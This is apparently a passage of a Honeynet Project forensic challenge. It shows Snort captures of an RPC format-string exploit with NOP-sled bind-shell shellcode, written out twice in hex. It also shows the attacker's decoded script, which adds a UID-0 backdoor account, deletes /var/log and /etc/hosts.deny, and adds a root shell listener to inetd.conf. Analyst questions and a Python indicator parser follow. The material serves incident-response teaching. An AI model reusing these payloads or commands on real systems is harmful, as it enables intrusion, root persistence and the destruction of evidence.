90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:14.517554 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:49145
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8  .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ............... 
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73  :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF  ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31  x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78  37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90  %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....

### The exploit is done. A shell was bound to port 39168. He
### now connects to this port and executes several commands.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.466595 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49963 DF
**S***** Seq: 0x6B9CD069   Ack: 0x0   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 98106716 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.467540 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:241 TOS:0x0 ID:26191
****R*** Seq: 0x0   Ack: 0x0   Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.468617 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48243 DF
**S***A* Seq: 0x4D5819B5   Ack: 0x6B9CD06A   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 107932029 98106716 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.613942 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49978 DF
******A* Seq: 0x6B9CD06A   Ack: 0x4D5819B6   Win: 0x7D78
TCP Options => NOP NOP TS: 98106736 107932029

### Here we see the commands executed by the bad guy. These commands
### appear to be scripted and NOT manually input. The script
### creates the two system accounts.
### Notice the script deletes /var/log and adds a /bin/sh listening
### on port 16000.
### QUESTION 6: What two accounts are created, and what are the UID's?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:22.847098 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:49 TOS:0x0 ID:50108 DF *****PA* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78 TCP Options => NOP NOP TS: 98106837 107932029 65 63 68 6F 20 75 73 65 72 3A 78 3A 35 30 30 30 echo user:x:5000 3A 35 30 30 30 3A 2F 75 73 65 72 3A 2F 74 6D 70 :5000:/user:/tmp 3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 :/bin/bash >> /e 74 63 2F 70 61 73 73 77 64 3B 20 65 63 68 6F 20 tc/passwd; echo 75 73 65 72 3A 59 69 32 79 43 47 48 6F 30 77 4F user:Yi2yCGHo0wO 77 67 3A 31 30 38 38 34 3A 30 3A 39 39 39 39 39 wg:10884:0:99999 3A 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 :7:-1:-1:1345384 31 32 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 12 >> /etc/shado 77 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C w; echo sendmail 3A 3A 31 30 38 36 35 3A 30 3A 39 39 39 39 39 3A ::10865:0:99999: 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 36 7:-1:-1:13453846 30 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0 >> /etc/shadow 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A ; echo sendmail: 78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69 x:0:0::/root:/bi 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70 n/bash >> /etc/p 61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72 asswd; pwconv; r 6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65 m -rf /var/log;e 63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D cho 16000 stream 20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 tcp nowait root 20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20 /usr/sbin/tcpd 2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F /bin/sh >> /etc/ 69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72 inetd.conf;rm -r 66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E f /etc/hosts.den 79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 y;killall -HUP i 6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08 netd;..@h8.@.... 84 9C 04 25 D6 9C 04 08 02 00 00 25 00 00 00 00 ...%.......%.... 
08 00 00 00 44 9C 04 08 44 00 00 00 00 00 00 00  ....D...D.......
00 00 00 00 00 00 00 00 00 00 00 00 4C FC FF BF  ............L...
EE 9B 04 08 C0 00 00 25 44 05 00 40 01 00 00 00  .......%D..@....
00 00 00 00 53 00 00 00 03 00 00 00 68 FD FF BF  ....S.......h...
4F FC FF BF 48 9C 04 08 41 9C 04 08 07 00 00 00  O...H...A.......
FF FF FF FF 79 0D 00 40 A3 84 02 40 68 38 01 40  ....y..@...@h8.@
E0 43 01 40 D3 64 00 00 0E 9B 02 40 6C F8 FF BF  .C.@.d.....@l...
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 02 14 00 40  ...@...@...@...@
80 F8 FF BF 02 14 00 40 88 F8 FF BF E6 81 00 40  .......@.......@
E1 13 00 40 D5 9A 02 40 68 38 01 40 0E 9B 02 40  ...@...@h8.@...@
A0 F8 FF BF E6 81 00 40 D5 9A 02 40 D5 9A 02 40  .......@...@...@
68 38 01 40 E0 43 01 40 23 38 00 00 C9 0E 00 40  h8.@.C.@#8.....@
00 00 00 00 A0 13 00 40 00 00 00 00 E0 43 01 40  .......@.....C.@
00 00 00 00 00 00 00 00 03 00 00 00 30 35 00 00  ............05..
01 00 00 00 00 00 64 20 00 00 00 00 00 00 00 00  ......d ........
A0 E2 01 40 53 03 00 00 D0 1F 02 40 70 AD 01 40  ...@S......@p..@
E0 43 01 40 03 00 00 00 50 46 01 40 01 00 00 00  .C.@....PF.@....
58 F8 73 20 FF FF FF FF F3 FF FF FF 00 00 00 00  X.s ............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 54 FF FF BF  ............T...
FF FF FF FF D0 FB 04 08 00 00 00 00 00 00 00 00  ................
00 00 00 00 05 00 00 00 01 00 00 00 98 FD FF BF  ................
6F FD FF BF ED 9B 04 08 EB 9B 04 08 0E 00 00 00  o...............
FF FF FF FF FD A7 00 40 D0 43 01 40 C0 46 01 40  .......@.C.@.F.@
07 00 00 00 4E A7 00 40 EC 81 10 40 29 B9 0F 40  ....N..@...@)..@
C5 B8 0F 40 E0 43 01 40 A0 E2 01 40 FC 84 10 40  ...@.C.@...@...@
F3 57 02 40 A0 E2 01 40 50 F9 FF BF 70 A9 00 40  .W.@...@P...p..@
14 00 00 00 04 F9 FF BF C0 81 07 40 E0 43 01 40  ...........@.C.@
EE 9B 04 08 EC 81 10 40 50 F9 FF BF 1B 3A 03 40  .......@P....:.@
43 00 0F 40 00 00 00 00 00 00 00 00 47 45 53 2F  C..@........GES/
6C 69 62 63 2E 6D 6F 00 EC 81 10 40 05 00 00 00  libc.mo....@....
74 FE FF BF E0 43 01 40 0F F9 FF BF B4 83 10 40  t....C.@.......@
B6 42 02 40 6F 00 01 40 05 00 00 00 00 F9 FF BF  .B.@o..@........
04 F9 FF BF D6 B8 0F 40 EF B8 0F 40 00 00 00 00  .......@...@....
6C F9 FF BF 24 64 0E 40 C0 B8 0F 40 06 24 10 40  l...$d.@...@.$.@
05 00 00 00 EC 81 10 40 DD FB 04 08 96 61 0E 40  .......@.....a.@
DD FB 04 08 06 24 10 40 EC 81 10 40 60 AE 00 40  .....$.@...@`..@
74 FE FF BF D0 FB 04 08 05 00 00 00 00 00 00 00  t...............
00 00 00 00 E8 80 01 40 18 00 00 00 F4 17 00 40  .......@.......@
04 00 00 00 E8 80 01 40 00 3C 01 40 0C FA FF BF  .......@.<.@....
08 FA FF BF 04 FA FF BF 00 3C 01 40 D4 80 01 40  .........<.@...@
00 00 00 00 14 08 00 40 D4 38 01 40 02 14 00 40  .......@.8.@...@
F4 02 00 40 80 87 04 08 80 87 04 08 24 FA FF BF  ...@........$...
02 00 00 00 D0 1F 02 40 00 3C 01 40 15 BA 00 40  .......@.<.@...@
68 38 01 40 14 08 00 40 B0 41 00 40 01 00 00 00  h8.@...@.A.@....
0C FA FF BF 28 15 00 40 C8 02 00 00 00 00 00 00  ....(..@........
80 87 04 08 00 00 00 00 01 00 00 00 24 08 00 40  ............$..@
2C FA FF BF BB 75 00 40 00 50 01 40 B2 2F 00 00  ,....u.@.P.@./..
68 38 01 40 64 FB FF BF 0E 38 00 40 68 38 01 40  h8.@d....8.@h8.@
0C 22 00 40 0E 9B 02 40 18 FB FF BF C1 0A 03 40  .".@...@.......@
EC 81 10 40 CC FB FF BF EC 81 10 40 EC 81 10 40  ...@.......@...@
FC FB FF BF 10 FD FF BF 68 38 01 40 C1 0A 03 40  ........h8.@...@
EC 81 10 40 EC FB FF BF EC 81 10 40 EC 81 10 40  ...@.......@...@
1C FC FF BF 30 FD FF BF 08 FC FF BF 00 00 00 00  ....0...........
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40  ............h..@
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00  ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40  ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF  ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40  ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF  .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08   ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00  .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40  ...........@...@
12 06 00 00 D0 1F 02 40 70 AD 01 40 E0 43 01 40  .......@p..@.C.@
03 00 00 00 50 46 01 40                          ....PF.@

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851135 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48244 DF
******A* Seq: 0x4D5819B6   Ack: 0x6B9CD612   Win: 0x7C70
TCP Options => NOP NOP TS: 107932167 98106837

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851231 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:50109 DF
***F*PA* Seq: 0x6B9CD612   Ack: 0x4D5819B6   Win: 0x7D78
TCP Options => NOP NOP TS: 98106837 107932029
01 00 00 00 54 FB FF BF 90 0E 02 40 E4 45 01 40  ....T......@.E.@
AE C7 1F 0D D0 FB FF BF EC 81 10 40 EC 81 10 40  ...........@...@
90 01 05 08 90 01 05 08 90 01 00 00 EC 81 10 40  ...............@
90 FB FF BF 80 64 00 00 A8 FB FF BF A8 FB FF BF  .....d..........
00 00 00 00 90 FB FF BF F0 11 02 40 D6 34 00 00  ...........@.4..
D0 1F 02 40 70 AD 01 40 E0 43 01 40 08 03 00 00  ...@p..@.C.@....
A9 46 00 00 A4 81 01 00 C1 0A 03 40 EC 81 10 40  .F.........@...@
CC FB FF BF EC 81 10 40 EC 81 10 40 FC FB FF BF  .......@...@....
10 FD FF BF CA 3F 32 3A 00 00 00 00 05 00 00 00  .....?2:........
ED 9B 0A 40 FC FB FF BF FC FB FF BF 02 00 00 00  ...@............
90 FC FF BF 00 00 00 00 2C 79 0E 40 60 AE 00 40  ........,y.@`..@
74 FE FF BF FF FF FF FF 20 68 10 40 00 70 01 40  t....... h.@.p.@
90 FC FF BF 01 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00  ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40  ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF  ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40  ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF  .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08   ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00  .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40  ...........@...@
00 00 00 00 68 AC 03 40 00 00 00 00 00 00 00 00  ....h..@........
A7 9B 04 08 00 00 00 00 00 00 00 00 A4 54 02 40  .............T.@
3E 69 02 40 44 5F 02 40 30 85 04 08 84 34 AD FB  >i.@D_.@0....4..
30 85 04 08 26 03 00 00 20 02 02 40 4B 05 00 00  0...&... ..@K...
D0 1F 02 40 70 AD 01 40 E0 43 01 40 03 00 00 00  ...@p..@.C.@....
EC 81 10 40 E4 E7 06 40 04 00 00 00 00 60 01 40  ...@...@.....`.@
0E 00 00 00 EC 81 10 40 00 60 01 40 90 01 05 08  .......@.`.@....
20 02 02 40 E0 43 01 40 24 FD FF BF C4 E8 06 40   ..@.C.@$......@
90 01 05 08 0E 60 01 40 00 00 01 00 00 00 00 00  .....`.@........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00                          ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.853395 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48245 DF
******A* Seq: 0x4D5819B6   Ack: 0x6B9CD86B   Win: 0x7A17
TCP Options => NOP NOP TS: 107932168 98106837

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Attack completed.

The unanswered questions are:

### QUESTION 1: Can you name the FTP scanning tool?
### QUESTION 2: What does this FTP exploit achieve? Does it open a port,
###             create a shell, add a user account?
### QUESTION 3: Is the FTP attack successful?
### QUESTION 4: What RPC service is exploited?
### QUESTION 5: Where in the exploit code below does he bind a shell to
###             port 39168?
### QUESTION 6: What two accounts are created, and what are the UIDs?

Do you have any further analysis you can add?

-------  Honeynet Project, http://project.honeynet.org  --------
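The scripted command string in the 07:17:22.847 packet above, reassembled from the snort hex column and checked for the indicators the commentary calls out (appended /etc/passwd entries and their UIDs, the inetd service line, the deleted paths). This is added example code, not part of the original Honeynet write-up; the sample dump is the first 25 rows of that packet's payload transcribed from the capture, and the parser assumes snort's fixed-width layout (16 bytes in a 48-character hex column, then the ASCII rendering).

```python
import re
# Constructed sample: first 25 rows of the 07:17:22.847 payload, snort layout.
DUMP = """\
65 63 68 6F 20 75 73 65 72 3A 78 3A 35 30 30 30  echo user:x:5000
3A 35 30 30 30 3A 2F 75 73 65 72 3A 2F 74 6D 70  :5000:/user:/tmp
3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F 65  :/bin/bash >> /e
74 63 2F 70 61 73 73 77 64 3B 20 65 63 68 6F 20  tc/passwd; echo
75 73 65 72 3A 59 69 32 79 43 47 48 6F 30 77 4F  user:Yi2yCGHo0wO
77 67 3A 31 30 38 38 34 3A 30 3A 39 39 39 39 39  wg:10884:0:99999
3A 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34  :7:-1:-1:1345384
31 32 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F  12 >> /etc/shado
77 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C  w; echo sendmail
3A 3A 31 30 38 36 35 3A 30 3A 39 39 39 39 39 3A  ::10865:0:99999:
37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 36  7:-1:-1:13453846
30 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  0 >> /etc/shadow
3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A  ; echo sendmail:
78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69  x:0:0::/root:/bi
6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70  n/bash >> /etc/p
61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72  asswd; pwconv; r
6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65  m -rf /var/log;e
63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D  cho 16000 stream
20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74   tcp nowait root
20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20   /usr/sbin/tcpd
2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F  /bin/sh >> /etc/
69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72  inetd.conf;rm -r
66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E  f /etc/hosts.den
79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69  y;killall -HUP i
6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08  netd;..@h8.@....
"""

def payload_bytes(dump):
    # Read only the 48-character hex column; the ASCII rendering is ignored.
    return bytes(int(t, 16) for line in dump.splitlines()
                 for t in line[:48].split() if re.fullmatch(r"[0-9A-Fa-f]{2}", t))

def analyze(dump):
    # The shell commands end at the first NUL; what follows is leftover stack data.
    text = payload_bytes(dump).split(b"\x00", 1)[0].decode("ascii")
    found = {"accounts": {}, "inetd": [], "removed": []}
    for cmd in (c.strip() for c in text.split(";") if c.strip()):
        if m := re.match(r"echo (\S+) >> /etc/passwd$", cmd):
            f = m.group(1).split(":")        # name:pw:uid:gid:gecos:home:shell
            found["accounts"][f[0]] = int(f[2])
        elif m := re.match(r"echo (.+) >> /etc/inetd.conf$", cmd):
            f = m.group(1).split()           # port proto wait user server args
            found["inetd"].append((int(f[0]), f[4], f[5:]))
        elif m := re.match(r"rm -rf (\S+)$", cmd):
            found["removed"].append(m.group(1))
    # A UID-0 account that is not "root" is a root-equivalent backdoor login.
    found["root_equiv"] = [n for n, u in found["accounts"].items() if u == 0 and n != "root"]
    return found
```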